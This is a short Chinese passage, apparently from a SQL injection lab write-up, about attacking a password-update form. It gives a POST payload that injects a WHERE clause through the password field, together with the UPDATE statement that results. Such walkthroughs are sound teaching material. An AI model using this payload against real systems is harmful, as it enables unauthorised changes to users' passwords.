因为是UPDATE语句，所以最好还是把剩下的WHERE username=’admin’补上，不然可能所有人密码都变了。
所以可以构造的语句是：

uname=admin&passwd=211' WHERE username='admin' and 1=2#&submit=Submit

对应的SQL语句为

UPDATE users SET password = '211' WHERE username='admin' and 1=2#' WHERE username='admin'